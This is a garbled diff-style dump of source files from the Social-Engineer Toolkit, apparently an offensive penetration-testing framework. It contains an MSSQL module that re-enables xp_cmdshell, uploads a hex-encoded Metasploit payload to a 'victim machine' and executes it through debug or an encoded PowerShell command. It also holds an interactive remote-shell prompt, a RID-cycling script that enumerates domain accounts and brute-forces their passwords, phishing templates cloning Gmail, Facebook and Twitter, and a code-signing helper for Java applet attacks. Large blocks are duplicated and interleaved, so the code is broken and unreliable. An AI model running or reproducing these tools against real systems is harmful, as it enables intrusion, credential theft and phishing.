# then we are using metasploit
if not os.path.isfile("src/program_junk/set.payload"):
if operating_system == "posix":
web_path = ("src/program_junk")
subprocess.Popen("cp src/program_junk/msf.exe src/program_junk/ 1> /dev/null 2> /dev/null", shell=True).wait()
subprocess.Popen("cp src/program_junk/msf2.exe src/program_junk/msf.exe 1> /dev/null 2> /dev/null", shell=True).wait()
fileopen = file("%s/msf.exe" % (web_path), "rb")
# read in the binary
data = fileopen.read()
# convert the binary to hex
data = binascii.hexlify(data)
# we write out binary out to a file
filewrite = file("src/program_junk/payload.hex", "w")
filewrite.write(data)
filewrite.close()
# connect to SQL server
target_server = _mssql.connect(ipaddr + ":" + str(port), username, password)
setcore.print_status("Connection established with SQL Server...")
setcore.print_status("Converting payload to hexadecimal...")
# if we are using a SET interactive shell payload then we need to make the path under web_clone versus program_junk
if os.path.isfile("src/program_junk/set.payload"):
web_path = ("src/program_junk/web_clone/")
# then we are using metasploit
if not os.path.isfile("src/program_junk/set.payload"):
if operating_system == "posix":
web_path = ("src/program_junk")
subprocess.Popen("cp src/program_junk/msf.exe src/program_junk/ 1> /dev/null 2> /dev/null", shell=True).wait()
subprocess.Popen("cp src/program_junk/msf2.exe src/program_junk/msf.exe 1> /dev/null 2> /dev/null", shell=True).wait()
fileopen = file("%s/msf.exe" % (web_path), "rb")
# read in the binary
data = fileopen.read()
# convert the binary to hex
data = binascii.hexlify(data)
# we write out binary out to a file
filewrite = file("src/program_junk/payload.hex", "w")
filewrite.write(data)
filewrite.close()
# if we are using metasploit, start the listener
if not os.path.isfile("%s/src/program_junk/set.payload" % (definepath)):
if operating_system == "posix":
import pexpect
meta_path = setcore.meta_path()
setcore.print_status("Starting the Metasploit listener...")
child2 = pexpect.spawn("%s/msfconsole -r src/program_junk/meta_config" % (meta_path))
# if we are using metasploit, start the listener
if not os.path.isfile("%s/src/program_junk/set.payload" % (definepath)):
if operating_system == "posix":
import pexpect
meta_path = setcore.meta_path()
setcore.print_status("Starting the Metasploit listener...")
child2 = pexpect.spawn("%s/msfconsole -r src/program_junk/meta_config" % (meta_path))
# random executable name
random_exe = setcore.generate_random_string(10,15)
# random executable name
random_exe = setcore.generate_random_string(10,15)
#
# next we deploy our hex to binary if we selected option 1 (powershell)
#
if option == "1":
# powershell command here, needs to be unicoded then base64 in order to use encodedcommand
powershell_command = unicode("""$s=gc "payload.hex";$s=[string]::Join('',$s);$s=$s.Replace('`r','');$s=$s.Replace('`n','');$b=new-object byte[] $($s.Length/2);0..$($b.Length-1)| % {$b[$_]=[Convert]::ToByte($s.Substring($($_*2),2),16)};[IO.File]::WriteAllBytes("payload.exe",$b);""")
########################################################################################################################################################################################################
#
# next we deploy our hex to binary if we selected option 1 (powershell)
# there is an odd bug with python unicode, traditional unicode inserts a null byte after each character typically.. python does not so the encodedcommand becomes corrupt
# in order to get around this a null byte is pushed to each string value to fix this and make the encodedcommand work properly
#
########################################################################################################################################################################################################
if option == "1":
# powershell command here, needs to be unicoded then base64 in order to use encodedcommand
powershell_command = unicode("""$s=gc "payload.hex";$s=[string]::Join('',$s);$s=$s.Replace('`r','');$s=$s.Replace('`n','');$b=new-object byte[] $($s.Length/2);0..$($b.Length-1)| % {$b[$_]=[Convert]::ToByte($s.Substring($($_*2),2),16)};[IO.File]::WriteAllBytes("payload.exe",$b);""")
########################################################################################################################################################################################################
#
# there is an odd bug with python unicode, traditional unicode inserts a null byte after each character typically.. python does not so the encodedcommand becomes corrupt
# in order to get around this a null byte is pushed to each string value to fix this and make the encodedcommand work properly
#
########################################################################################################################################################################################################
# blank command will store our fixed unicode variable
blank_command = ""
# loop through each character and insert null byte
for char in powershell_command:
# insert the nullbyte
blank_command += char + "\x00"
# blank command will store our fixed unicode variable
blank_command = ""
# loop through each character and insert null byte
for char in powershell_command:
# insert the nullbyte
blank_command += char + "\x00"
# assign powershell command as the new one
powershell_command = blank_command
# base64 encode the powershell command
powershell_command = base64.b64encode(powershell_command)
# this will trigger when we are ready to convert
# assign powershell command as the new one
powershell_command = blank_command
# base64 encode the powershell command
powershell_command = base64.b64encode(powershell_command)
# this will trigger when we are ready to convert
#
# next we deploy our hex to binary if we selected option 2 (debug)
#
if option == "2":
setcore.print_status("Attempting to re-enable the xp_cmdshell stored procedure if disabled..")
# reconfigure the stored procedure and re-enable
try:
target_server.execute_query("EXEC master.dbo.sp_configure 'show advanced options', 1")
target_server.execute_query("RECONFIGURE")
target_server.execute_query("EXEC master.dbo.sp_configure 'xp_cmdshell', 1")
target_server.execute_query("RECONFIGURE")
except: pass
# we selected hex to binary
fileopen = file("src/payloads/hex2binary.payload", "r")
# specify random filename for deployment
setcore.print_status("Deploying initial debug stager to the system.")
random_file = setcore.generate_random_string(10,15)
for line in fileopen:
# remove bogus chars
line = line.rstrip()
# make it printer friendly to screen
print_line = line.replace("echo e", "")
setcore.print_status("Deploying stager payload (hex): " + setcore.bcolors.BOLD + str(print_line) + setcore.bcolors.ENDC)
target_server.execute_query("xp_cmdshell '%s>> %s'" % (line,random_file))
setcore.print_status("Converting the stager to a binary...")
# here we convert it to a binary
target_server.execute_query("xp_cmdshell 'debug<%s'" % (random_file))
setcore.print_status("Conversion complete. Cleaning up...")
# delete the random file
target_server.execute_query("xp_cmdshell 'del %s'" % (random_file))
# here we start the conversion and execute the payload
setcore.print_status("Sending the main payload via to be converted back to a binary.")
# read in the file 900 bytes at a time
fileopen = file("src/program_junk/payload.hex", "r")
#random_exe = setcore.generate_random_string(10,15)
while fileopen:
data = fileopen.read(900).rstrip()
# if data is done then break out of loop because file is over
if data == "": break
setcore.print_status("Deploying payload to victim machine (hex): " + setcore.bcolors.BOLD + str(data) + setcore.bcolors.ENDC + "\n")
target_server.execute_query("xp_cmdshell 'echo %s>> %s'" % (data, random_exe))
setcore.print_status("Delivery complete. Converting hex back to binary format.")
# if we are using debug conversion then convert our binary
if option == "2":
target_server.execute_query("xp_cmdshell 'rename MOO.bin %s.exe'" % (random_file))
target_server.execute_query("xp_cmdshell '%s %s'" % (random_file, random_exe))
# clean up the old files
setcore.print_status("Cleaning up old files..")
target_server.execute_query("xp_cmdshell 'del %s'" % (random_exe))
# if we are using SET payload
if os.path.isfile("%s/src/program_junk/set.payload" % (definepath)):
setcore.print_status("Spawning seperate child process for listener...")
try: shutil.copyfile("src/program_junk/web_clone/x", definepath)
except: pass
# start a threaded webserver in the background
subprocess.Popen("python src/html/fasttrack_http_server.py", shell=True)
# grab the port options
if check_options("PORT=") != 0:
port = check_options("PORT=")
# if for some reason the port didnt get created we default to 443
else:
port = "443"
# launch the python listener through pexpect
# need to change the directory real quick
os.chdir(definepath)
# now back
os.chdir("%s/src/program_junk/web_clone/" % (definepath))
setcore.print_status("Pausing 10 seconds to let the system catch up...")
time.sleep(10)
setcore.print_status("Triggering payload stager...")
# thread is needed here due to the connect not always terminating thread, it hangs if thread isnt specified
import thread
# execute the payload
# we append more commands if option 1 is used
if option == "1":
random_exe_execute = random_exe
random_exe = "powershell -EncodedCommand " + powershell_command
sql_command = ("xp_cmdshell '%s'" % (random_exe))
# start thread of SQL command that executes payload
thread.start_new_thread(target_server.execute_query, (sql_command,))
time.sleep(1)
# trigger the exe if option 1 is used
if option == "1":
sql_command = ("xp_cmdshell '%s'" % (random_exe_execute))
thread.start_new_thread(target_server.execute_query, (sql_command,))
# if pexpect doesnt exit right then it freaks out
if os.path.isfile("%s/src/program_junk/set.payload" % (definepath)):
os.system("python ../../payloads/set_payloads/listener.py")
#
# next we deploy our hex to binary if we selected option 2 (debug)
#
if option == "2":
setcore.print_status("Attempting to re-enable the xp_cmdshell stored procedure if disabled..")
# reconfigure the stored procedure and re-enable
try:
# interact with the child process through pexpect
child2.interact()
try:
os.remove("x")
except: pass
target_server.execute_query("EXEC master.dbo.sp_configure 'show advanced options', 1")
target_server.execute_query("RECONFIGURE")
target_server.execute_query("EXEC master.dbo.sp_configure 'xp_cmdshell', 1")
target_server.execute_query("RECONFIGURE")
except: pass
# we selected hex to binary
fileopen = file("src/payloads/hex2binary.payload", "r")
# specify random filename for deployment
setcore.print_status("Deploying initial debug stager to the system.")
random_file = setcore.generate_random_string(10,15)
for line in fileopen:
# remove bogus chars
line = line.rstrip()
# make it printer friendly to screen
print_line = line.replace("echo e", "")
setcore.print_status("Deploying stager payload (hex): " + setcore.bcolors.BOLD + str(print_line) + setcore.bcolors.ENDC)
target_server.execute_query("xp_cmdshell '%s>> %s'" % (line,random_file))
setcore.print_status("Converting the stager to a binary...")
# here we convert it to a binary
target_server.execute_query("xp_cmdshell 'debug<%s'" % (random_file))
setcore.print_status("Conversion complete. Cleaning up...")
# delete the random file
target_server.execute_query("xp_cmdshell 'del %s'" % (random_file))
# here we start the conversion and execute the payload
setcore.print_status("Sending the main payload via to be converted back to a binary.")
# read in the file 900 bytes at a time
fileopen = file("src/program_junk/payload.hex", "r")
#random_exe = setcore.generate_random_string(10,15)
while fileopen:
data = fileopen.read(900).rstrip()
# if data is done then break out of loop because file is over
if data == "": break
setcore.print_status("Deploying payload to victim machine (hex): " + setcore.bcolors.BOLD + str(data) + setcore.bcolors.ENDC + "\n")
target_server.execute_query("xp_cmdshell 'echo %s>> %s'" % (data, random_exe))
setcore.print_status("Delivery complete. Converting hex back to binary format.")
# if we are using debug conversion then convert our binary
if option == "2":
target_server.execute_query("xp_cmdshell 'rename MOO.bin %s.exe'" % (random_file))
target_server.execute_query("xp_cmdshell '%s %s'" % (random_file, random_exe))
# clean up the old files
setcore.print_status("Cleaning up old files..")
target_server.execute_query("xp_cmdshell 'del %s'" % (random_exe))
# if we are using SET payload
if os.path.isfile("%s/src/program_junk/set.payload" % (definepath)):
setcore.print_status("Spawning seperate child process for listener...")
try: shutil.copyfile("src/program_junk/web_clone/x", definepath)
except: pass
# start a threaded webserver in the background
subprocess.Popen("python src/html/fasttrack_http_server.py", shell=True)
# grab the port options
if check_options("PORT=") != 0:
port = check_options("PORT=")
# if for some reason the port didnt get created we default to 443
else:
port = "443"
# launch the python listener through pexpect
# need to change the directory real quick
os.chdir(definepath)
# now back
os.chdir("%s/src/program_junk/web_clone/" % (definepath))
setcore.print_status("Pausing 10 seconds to let the system catch up...")
time.sleep(10)
setcore.print_status("Triggering payload stager...")
# thread is needed here due to the connect not always terminating thread, it hangs if thread isnt specified
import thread
# execute the payload
# we append more commands if option 1 is used
if option == "1":
random_exe_execute = random_exe
random_exe = "powershell -EncodedCommand " + powershell_command
sql_command = ("xp_cmdshell '%s'" % (random_exe))
# start thread of SQL command that executes payload
thread.start_new_thread(target_server.execute_query, (sql_command,))
time.sleep(1)
# trigger the exe if option 1 is used
if option == "1":
sql_command = ("xp_cmdshell '%s'" % (random_exe_execute))
thread.start_new_thread(target_server.execute_query, (sql_command,))
# if pexpect doesnt exit right then it freaks out
if os.path.isfile("%s/src/program_junk/set.payload" % (definepath)):
os.system("python ../../payloads/set_payloads/listener.py")
try:
# interact with the child process through pexpect
child2.interact()
try:
os.remove("x")
except: pass
except: pass
#
# this will deploy an already prestaged executable that reads in hexadecimal and back to binary
#
def cmdshell(ipaddr,port,username,password,option):
# connect to SQL server
mssql = _mssql.connect(ipaddr + ":" + str(port), username, password)
setcore.print_status("Connection established with SQL Server...")
setcore.print_status("Attempting to re-enable xp_cmdshell if disabled...")
try:
mssql.execute_query("EXEC master.dbo.sp_configure 'show advanced options', 1")
mssql.execute_query("RECONFIGURE")
mssql.execute_query("EXEC master.dbo.sp_configure 'xp_cmdshell', 1")
mssql.execute_query("RECONFIGURE")
except Exception, e: pass
setcore.print_status("Enter your Windows Shell commands in the xp_cmdshell - prompt...")
mssql.select_db('master')
while 1:
# cmdshell command
cmd = raw_input("xp_cmdshell> ")
# exit if we want
if cmd == "quit" or cmd == "exit": break
mssql.execute_query("xp_cmdshell '%s'" % (cmd))
if cmd != "":
for line in mssql:
# formatting for mssql output
line = str(line)
line = line.replace("', 'output': '", "\n")
line = line.replace("{0: '", "")
line = line.replace("'}", "")
line = line.replace("{0: None, 'output': None}", "")
line = line.replace("\\r", "")
line = line.replace("The command completed with one or more errors.", "")
print line
# connect to SQL server
mssql = _mssql.connect(ipaddr + ":" + str(port), username, password)
setcore.print_status("Connection established with SQL Server...")
setcore.print_status("Attempting to re-enable xp_cmdshell if disabled...")
try:
mssql.execute_query("EXEC master.dbo.sp_configure 'show advanced options', 1")
mssql.execute_query("RECONFIGURE")
mssql.execute_query("EXEC master.dbo.sp_configure 'xp_cmdshell', 1")
mssql.execute_query("RECONFIGURE")
except Exception, e: pass
setcore.print_status("Enter your Windows Shell commands in the xp_cmdshell - prompt...")
mssql.select_db('master')
while 1:
# cmdshell command
cmd = raw_input("xp_cmdshell> ")
# exit if we want
if cmd == "quit" or cmd == "exit": break
mssql.execute_query("xp_cmdshell '%s'" % (cmd))
if cmd != "":
for line in mssql:
# formatting for mssql output
line = str(line)
line = line.replace("', 'output': '", "\n")
line = line.replace("{0: '", "")
line = line.replace("'}", "")
line = line.replace("{0: None, 'output': None}", "")
line = line.replace("\\r", "")
line = line.replace("The command completed with one or more errors.", "")
print line

310
src/fasttrack/rid_enum.py
View file

@ -5,7 +5,7 @@ import sys
#############################################################################################################
#
# RID Enum v0.2
# RID Cycling Tool
# RID Cycling Tool
#
# Written by: David Kennedy (ReL1K)
# Website: https://www.trustedsec.com
@ -19,192 +19,192 @@ import sys
# attempt to use lsa query furst
def check_user_lsa(ip):
# pull the domain via lsaenum
proc = subprocess.Popen('rpcclient -U "" %s -N -c "lsaquery"' % (ip), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
stdout_value=proc.communicate()[0]
# if the user wasnt found, return a False
if not "Domain Sid" in stdout_value:
return False
else:
return stdout_value
# pull the domain via lsaenum
proc = subprocess.Popen('rpcclient -U "" %s -N -c "lsaquery"' % (ip), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
stdout_value=proc.communicate()[0]
# if the user wasnt found, return a False
if not "Domain Sid" in stdout_value:
return False
else:
return stdout_value
# attempt to lookup an account via rpcclient
def check_user(ip, account):
proc = subprocess.Popen('rpcclient -U "" %s -N -c "lookupnames %s"' % (ip,account), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
stdout_value=proc.communicate()[0]
# if the user wasnt found, return a False
if "NT_STATUS_NONE_MAPPED" in stdout_value:
return False
else:
return stdout_value
proc = subprocess.Popen('rpcclient -U "" %s -N -c "lookupnames %s"' % (ip,account), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
stdout_value=proc.communicate()[0]
# if the user wasnt found, return a False
if "NT_STATUS_NONE_MAPPED" in stdout_value:
return False
else:
return stdout_value
# this will do a conversion to find the account name based on rid
def sid_to_name(ip, sid, rid):
proc = subprocess.Popen('rpcclient -U "" %s -N -c "lookupsids %s-%s"' % (ip, sid,rid), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
stdout_value = proc.communicate()[0]
if not "*unknown*" in stdout_value:
stdout_value = stdout_value.split(" ")
# will show during an unhandled request
if stdout_value[1] != "request":
return stdout_value[1]
proc = subprocess.Popen('rpcclient -U "" %s -N -c "lookupsids %s-%s"' % (ip, sid,rid), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
stdout_value = proc.communicate()[0]
if not "*unknown*" in stdout_value:
stdout_value = stdout_value.split(" ")
# will show during an unhandled request
if stdout_value[1] != "request":
return stdout_value[1]
# capture initial input
success = ""
try:
ip = sys.argv[1]
rid_start = sys.argv[2]
rid_stop = sys.argv[3]
# if password file was specified
passwords = ""
try:
# pull in password file
passwords = sys.argv[4]
# if its not there then bomb out
if not os.path.isfile(passwords):
print "[!] File was not found. Please try a path again."
sys.exit()
ip = sys.argv[1]
rid_start = sys.argv[2]
rid_stop = sys.argv[3]
# if password file was specified
passwords = ""
try:
# pull in password file
passwords = sys.argv[4]
# if its not there then bomb out
if not os.path.isfile(passwords):
print "[!] File was not found. Please try a path again."
sys.exit()
except IndexError:
pass
except IndexError:
pass
# check for python pexpect
try:
import pexpect
# check for python pexpect
try:
import pexpect
# if we dont have it
except ImportError:
print "[!] Sorry boss, python-pexpect is not installed. You need to install this first."
sys.exit()
# if we dont have it
except ImportError:
print "[!] Sorry boss, python-pexpect is not installed. You need to install this first."
sys.exit()
print "[*] Attempting lsaquery first...This will enumerate the base domain SID"
# call the check_user_lsa function and check to see if we can find base SID guid
sid = check_user_lsa(ip)
# if lsa enumeration was successful then don't do
if sid != False:
if sid != "":
print "[*] Successfully enumerated base domain SID.. Moving on to extract via RID"
# format it properly
sid = sid.rstrip()
sid = sid.split(" ")
sid = sid[4]
print "[*] Attempting lsaquery first...This will enumerate the base domain SID"
# call the check_user_lsa function and check to see if we can find base SID guid
sid = check_user_lsa(ip)
# if lsa enumeration was successful then don't do
if sid != False:
if sid != "":
print "[*] Successfully enumerated base domain SID.. Moving on to extract via RID"
# format it properly
sid = sid.rstrip()
sid = sid.split(" ")
sid = sid[4]
# if we weren't successful on lsaquery
if sid == False:
print "[!] Unable to enumerate through lsaquery, trying default account names.."
accounts = ("administrator", "guest", "krbtgt")
for account in accounts:
# check the user account based on tuple
sid = check_user(ip, account)
# if its false then cycle threw
if sid == False:
print "[!] Failed using account name: %s...Attempting another." % (account)
else:
if sid != "":
# success! Break out of the loop
print "[*] Successfully enumerated SID account.. Moving on to extract via RID.\n"
break
else:
print "[!] Failed. Access is denied. Sorry boss."
sys.exit()
# if we weren't successful on lsaquery
if sid == False:
print "[!] Unable to enumerate through lsaquery, trying default account names.."
accounts = ("administrator", "guest", "krbtgt")
for account in accounts:
# check the user account based on tuple
sid = check_user(ip, account)
# if its false then cycle threw
if sid == False:
print "[!] Failed using account name: %s...Attempting another." % (account)
else:
if sid != "":
# success! Break out of the loop
print "[*] Successfully enumerated SID account.. Moving on to extract via RID.\n"
break
else:
print "[!] Failed. Access is denied. Sorry boss."
sys.exit()
# pulling the exact domain SID out
sid = sid.split(" ")
# pull first in tuple
sid = sid[1]
# remove the RID number
sid = sid[:-4]
# pulling the exact domain SID out
sid = sid.split(" ")
# pull first in tuple
sid = sid[1]
# remove the RID number
sid = sid[:-4]
# we has no sids :( exiting
if sid == False:
print "[!] Unable to enumerate user accounts, sorry..Must not be vulnerable."
sys.exit()
# we has no sids :( exiting
if sid == False:
print "[!] Unable to enumerate user accounts, sorry..Must not be vulnerable."
sys.exit()
print "[*] Enumerating user accounts.. This could take a little while."
# assign rid start and stop as integers
rid_start = int(rid_start)
rid_stop = int(rid_stop)
print "[*] Enumerating user accounts.. This could take a little while."
# assign rid start and stop as integers
rid_start = int(rid_start)
rid_stop = int(rid_stop)
# this is where we write out our output
if os.path.isfile("%s_users.txt" % (ip)):
# remove old file
os.remove("%s_users.txt" % (ip))
filewrite = file("%s_users.txt" % (ip), "a")
# this is where we write out our output
if os.path.isfile("%s_users.txt" % (ip)):
# remove old file
os.remove("%s_users.txt" % (ip))
filewrite = file("%s_users.txt" % (ip), "a")
# cycle through rid and enumerate the domain
while rid_start != rid_stop:
sidname = sid_to_name(ip, sid, rid_start)
if sidname != None:
# print the sid
print "Account name: " + sidname
# write the file out
filewrite.write(sidname + "\n")
# cycle through rid and enumerate the domain
while rid_start != rid_stop:
sidname = sid_to_name(ip, sid, rid_start)
if sidname != None:
# print the sid
print "Account name: " + sidname
# write the file out
filewrite.write(sidname + "\n")
# increase rid until we hit our rid_stop
rid_start = rid_start + 1
# increase rid until we hit our rid_stop
rid_start = rid_start + 1
# close the file
filewrite.close()
# close the file
filewrite.close()
print "[*] Finished enumerating user accounts... Seemed to be successful."
print "[*] Finished enumerating user accounts... Seemed to be successful."
# if we specified a password list
if passwords != "":
# our password file
passfile = file(passwords, "r").readlines()
# our list of users
userfile = file("%s_users.txt" % (ip), "r").readlines()
# if we specified a password list
if passwords != "":
# our password file
passfile = file(passwords, "r").readlines()
# cycle through a password list
for password in passfile:
# strip unused characters
password = password.rstrip()
for user in userfile:
# strip unused characters
user = user.rstrip()
# insert additional backslash for rpcclient compliance
user_fixed = user.replace("\\", "\\\\")
# brute force, single quotes in names mess things up
if not "'" in user:
child = pexpect.spawn("rpcclient -U '%s%%%s' %s" % (user_fixed, password, ip))
i = child.expect(['LOGON_FAILURE', 'rpcclient'])
if i == 0:
print "Failed guessing username of %s and password of %s" % (user, password)
child.kill(0)
if i == 1:
print "[*] Successfully guessed username: %s with password of: %s" % (user, password)
success = success + "username: %s password: %s\n" % (user, password)
child.kill(0)
# our list of users
userfile = file("%s_users.txt" % (ip), "r").readlines()
# if we weren't successful
if success == "":
print "\n[!] Unable to brute force a user account, sorry boss."
# cycle through a password list
for password in passfile:
# strip unused characters
password = password.rstrip()
for user in userfile:
# strip unused characters
user = user.rstrip()
# insert additional backslash for rpcclient compliance
user_fixed = user.replace("\\", "\\\\")
# brute force, single quotes in names mess things up
if not "'" in user:
child = pexpect.spawn("rpcclient -U '%s%%%s' %s" % (user_fixed, password, ip))
i = child.expect(['LOGON_FAILURE', 'rpcclient'])
if i == 0:
print "Failed guessing username of %s and password of %s" % (user, password)
child.kill(0)
if i == 1:
print "[*] Successfully guessed username: %s with password of: %s" % (user, password)
success = success + "username: %s password: %s\n" % (user, password)
child.kill(0)
# if we got lucky
else:
filewrite = file("%s_success_results.txt" % (ip), "w")
filewrite.write(success)
print "[*] We got some accounts, exported results to %s_success_results.txt" % (ip)
# if we weren't successful
if success == "":
print "\n[!] Unable to brute force a user account, sorry boss."
print "[*] All accounts extracted via RID cycling have been exported to %s_users.txt" % (ip)
# exit out after we are finished
sys.exit()
# if we got lucky
else:
filewrite = file("%s_success_results.txt" % (ip), "w")
filewrite.write(success)
print "[*] We got some accounts, exported results to %s_success_results.txt" % (ip)
print "[*] All accounts extracted via RID cycling have been exported to %s_users.txt" % (ip)
# exit out after we are finished
sys.exit()
# except keyboard interrupt
except KeyboardInterrupt:
print "[*] Okay, Okay... Exiting... Thanks for using rid_enum.py"
print "[*] Okay, Okay... Exiting... Thanks for using rid_enum.py"
# except indexerror
except IndexError, e:
print """
.______ __ _______ _______ .__ __. __ __ .___ ___.
| _ \ | | | \ | ____|| \ | | | | | | | \/ |
| |_) | | | | .--. | | |__ | \| | | | | | | \ / |
| / | | | | | | | __| | . ` | | | | | | |\/| |
| |\ \----.| | | '--' | | |____ | |\ | | `--' | | | | |
| _| `._____||__| |_______/ _____|_______||__| \__| \______/ |__| |__|
|______|
print """
.______ __ _______ _______ .__ __. __ __ .___ ___.
| _ \ | | | \ | ____|| \ | | | | | | | \/ |
| |_) | | | | .--. | | |__ | \| | | | | | | \ / |
| / | | | | | | | __| | . ` | | | | | | |\/| |
| |\ \----.| | | '--' | | |____ | |\ | | `--' | | | | |
| _| `._____||__| |_______/ _____|_______||__| \__| \______/ |__| |__|
|______|
Written by: David Kennedy (ReL1K)
Version: 0.2
@ -212,8 +212,8 @@ Company: https://www.trustedsec.com
Twitter: @TrustedSec
Twitter: @Dave_ReL1K
Rid Enum is a RID cycling attack that attempts to enumerate user accounts through
null sessions and the SID to RID enum. If you specify a password file, it will
Rid Enum is a RID cycling attack that attempts to enumerate user accounts through
null sessions and the SID to RID enum. If you specify a password file, it will
automatically attempt to brute force the user accounts when its finished enumerating.
- RID_ENUM is open source and uses all standard python libraries minus python-pexpect. -
@ -222,4 +222,4 @@ Example: ./rid_enum.py 192.168.1.50 500 50000 /root/dict.txt
Usage: ./rid_enum.py <server_ip> <start_rid> <end_rid> <optional_password_file>
"""
sys.exit()
sys.exit()

4
src/fasttrack/sccm/sccm_main.py
View file

@ -19,7 +19,7 @@ Set Results = objSMS.ExecQuery _
("SELECT * From SMS_ProviderLocation WHERE ProviderForLocalSite = true")
For each Loc in Results
If Loc.ProviderForLocalSite = True Then
Set objSMS2 = objLoc.ConnectServer(Loc.Machine, "root\sms\site_"& _
Set objSMS2 = objLoc.ConnectServer(Loc.Machine, "root\sms\site_"& _
Loc.SiteCode)
strSMSSiteCode = Loc.SiteCode
end if
@ -28,7 +28,7 @@ Set Results = objSMS.ExecQuery _
Set objPkgs = objSMS2.ExecQuery("select * from SMS_Package where PackageID = '" & strPackageID & "'")
for each objPkg in objPkgs
objPkg.RefreshPkgSource(0)
Next
Next
''' % (sms_server, package_id)
# write out the file to reports

962
src/html/spawn.py
View file

File diff suppressed because it is too large Load diff

32
src/html/templates/template.py
View file

@ -12,7 +12,7 @@ core.debug_msg(me,"entering src.html.templates.template'",1)
# used for pre-defined templates
#
print """
1. Java Required
1. Java Required
2. Gmail
3. Google
4. Facebook
@ -31,33 +31,33 @@ if choice == "": choice = "1"
# if java required
if choice == "1":
if os.path.isfile("src/html/index.template"): os.remove("src/html/index.template")
shutil.copyfile("src/html/templates/java/index.template", "src/html/index.template")
URL=""
if os.path.isfile("src/html/index.template"): os.remove("src/html/index.template")
shutil.copyfile("src/html/templates/java/index.template", "src/html/index.template")
URL=""
# if gmail
if choice == "2":
if os.path.isfile("src/html/index.template"): os.remove("src/html/index.template")
shutil.copyfile("src/html/templates/gmail/index.template", "src/html/index.template")
URL="https://gmail.com"
if os.path.isfile("src/html/index.template"): os.remove("src/html/index.template")
shutil.copyfile("src/html/templates/gmail/index.template", "src/html/index.template")
URL="https://gmail.com"
# if google
if choice == "3":
if os.path.isfile("src/html/index.template"): os.remove("src/html/index.template")
shutil.copyfile("src/html/templates/google/index.template", "src/html/index.template")
URL="http://www.google.com"
if os.path.isfile("src/html/index.template"): os.remove("src/html/index.template")
shutil.copyfile("src/html/templates/google/index.template", "src/html/index.template")
URL="http://www.google.com"
# if facebook
if choice == "4":
if os.path.isfile("src/html/index.template"): os.remove("src/html/index.template")
shutil.copyfile("src/html/templates/facebook/index.template", "src/html/index.template")
URL="http://www.facebook.com"
if os.path.isfile("src/html/index.template"): os.remove("src/html/index.template")
shutil.copyfile("src/html/templates/facebook/index.template", "src/html/index.template")
URL="http://www.facebook.com"
# if twitter
if choice == "5":
if os.path.isfile("src/html/index.template"): os.remove("src/html/index.template")
shutil.copyfile("src/html/templates/twitter/index.template", "src/html/index.template")
URL="http://www.twitter.com"
if os.path.isfile("src/html/index.template"): os.remove("src/html/index.template")
shutil.copyfile("src/html/templates/twitter/index.template", "src/html/index.template")
URL="http://www.twitter.com"
if not os.path.isdir("src/program_junk/web_clone"):
os.makedirs("src/program_junk/web_clone/")
if os.path.isfile("src/program_junk/web_clone/index.html"): os.remove("src/program_junk/web_clone/index.html")

138
src/html/unsigned/verified_sign.py
View file

@ -22,13 +22,13 @@ definepath = os.getcwd()
# print warning message that we need to install sun-java or openjdk
print """
This menu will allow you to import or create a valid code signing certificate for the Java Applet attack.
This menu will allow you to import or create a valid code signing certificate for the Java Applet attack.
You will need to purchase a code signing certificate through GoDaddy, Thawte, Verisign, etc. in order to
You will need to purchase a code signing certificate through GoDaddy, Thawte, Verisign, etc. in order to
make this work. This menu will automate the portions for you to either create the request to submit to the
certificate authority or allow you to import a code signing certificate that you may already have.
Note that purchasing a code signing certificate is somewhat difficult. It requires you to have a business name and
Note that purchasing a code signing certificate is somewhat difficult. It requires you to have a business name and
prove the legitimacy of that certificate. That means you have to register a business with the state and everything else.
Good news is, the process to do that is extremely simple. All in all, it should cost roughly around $300-350 to setup your
@ -46,83 +46,83 @@ use_flag = 0
prompt = raw_input(core.setprompt("0", "Have you already generated a code signing-certificate? [yes|no]")).lower()
# if we selected yes if we generated a code signing certificate
if prompt == "yes" or prompt == "y":
# prompt the user to import the code signing certificate
cert_path=raw_input(core.setprompt("0", "Path to the code signing certificate file"))
if not os.path.isfile(cert_path):
# loop forever
while 1 == 1:
core.print_error("ERROR:Filename not found. Try again.")
# re-prompt if we didn't file the filename
cert_path=raw_input(core.setprompt("0", "Path to the .cer certificate file"))
# if we find the filename then break out of loop
if os.path.isfile(cert_path): break
# prompt the user to import the code signing certificate
cert_path=raw_input(core.setprompt("0", "Path to the code signing certificate file"))
if not os.path.isfile(cert_path):
# loop forever
while 1 == 1:
core.print_error("ERROR:Filename not found. Try again.")
# re-prompt if we didn't file the filename
cert_path=raw_input(core.setprompt("0", "Path to the .cer certificate file"))
# if we find the filename then break out of loop
if os.path.isfile(cert_path): break
# here is where we import the certificate
try:
core.print_info("Importing the certificate into SET...")
# here is where we import the certificate
try:
core.print_info("Importing the certificate into SET...")
subprocess.Popen("keytool -import -alias MyCert -file %s" % (cert_path), shell=True).wait()
# trigger that we have our certificate already and bypass the request process below
use_flag = 1
# exception here in case it was already imported before
except: pass
subprocess.Popen("keytool -import -alias MyCert -file %s" % (cert_path), shell=True).wait()
# trigger that we have our certificate already and bypass the request process below
use_flag = 1
# exception here in case it was already imported before
except: pass
# this will exit the menu
if prompt == "quit" or prompt == "q":
use_flag = 0
prompt = "yes"
cert_path = ""
if prompt == "quit" or prompt == "q":
use_flag = 0
prompt = "yes"
cert_path = ""
# if we have a cert now or if we need to generate one
if use_flag == 1 or prompt == "no" or prompt == "n":
# if we selected no we need to create one
if prompt == "no" or prompt == "n":
# get the stuff ready to do it
core.print_info("Generating the initial request for Verisign...")
# grab input from user, fqdn
answer1=raw_input(core.setprompt("0", "FQDN (ex. www.thisisafakecert.com)"))
# grab name of organizaton
answer2=raw_input(core.setprompt("0", "Name of the organization"))
# grab two letter country code
answer3=raw_input(core.setprompt("0", "Two letter country code (ex. US)"))
# if blank, default to US
if answer3 == "": answer3 = "US"
# grab state
answer4=raw_input(core.setprompt("0", "State"))
# grab city
answer5=raw_input(core.setprompt("0", "City"))
# generate the request crl
subprocess.Popen('keytool -genkey -alias MyCert -keyalg RSA -keysize 2048 -dname "CN=%s,O=%s,C=%s,ST=%s,L=%s"' % (answer1,answer2,answer3, answer4, answer5), shell=True).wait()
core.print_info("Exporting the cert request to text file...")
# generate the request and export to certreq
